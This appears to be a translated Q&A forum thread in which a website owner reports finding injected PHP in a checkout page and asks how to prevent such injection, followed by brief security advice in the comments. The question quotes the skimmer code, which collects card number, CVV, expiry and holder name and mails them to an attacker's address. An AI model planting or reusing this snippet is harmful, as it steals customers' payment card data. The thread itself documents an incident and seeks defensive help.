【发布时间】:2013-06-28 16:12:41
【问题描述】:
我只是在我们创建的网站中重新测试流程,当我到达结帐部分时,我意识到页面中有一些我们从未编写过的代码。这是一次注射,它真的让我们害怕。 该代码只是作为文本放在其中一个签出文件中,因此它不会执行,因为它不在 PHP 标记中,但它非常可怕。
代码本质上是发布支付指令的每个字段(卡上的名称、卡类型、卡号、cvc、到期日期),然后执行 mail() php 函数将信息发送到特定的电子邮件。我什至有黑客的电子邮件!!
$message .= "Number : ".$_POST['card_number']."\n";
$message .= "Cvv : ".$_POST['card_brand']."\n";
$message .= "exp : ".$_POST['card_expiration']."\n";
$message .= "Name : ".$_POST['card_holder']."\n";
$i = "______@yahoo.fr";
$subject = "cc";
mail($i,$subject,$message);
我们如何避免在我们的网站中注入 PHP?我联系了支持我们付款的 Stripe,以检查他们的 API 是否足够安全。我认为是这样。然而,邮寄信息和其他与付款无关的信息很容易被这样的注入攻击。我们如何避免文件中的注入?
谢谢!!
【问题讨论】:
-
有成千上万种方式可能会导致您被黑客入侵,可能是服务器/ftp/ssh 帐户,或者脚本本身易受 RFI 攻击,上传表单未正确检查文件等。您将不得不审查您的代码并采取措施。
-
如果攻击者能够修改您的脚本之一,尽管是在 PHP 标记之外,那么您的系统中存在严重漏洞。您应该放弃所有开发工作,将查找和修复漏洞作为当务之急,尤其是考虑到您似乎直接获取信用卡详细信息。首先分析日志文件并检查所有软件是否都是最新的(Web 服务器、FTP 守护程序等)。
-
不幸的是我不拥有服务器。它是一个提供者。我自己能做什么?我已经把投诉转告给他们了。
标签: php post payment code-injection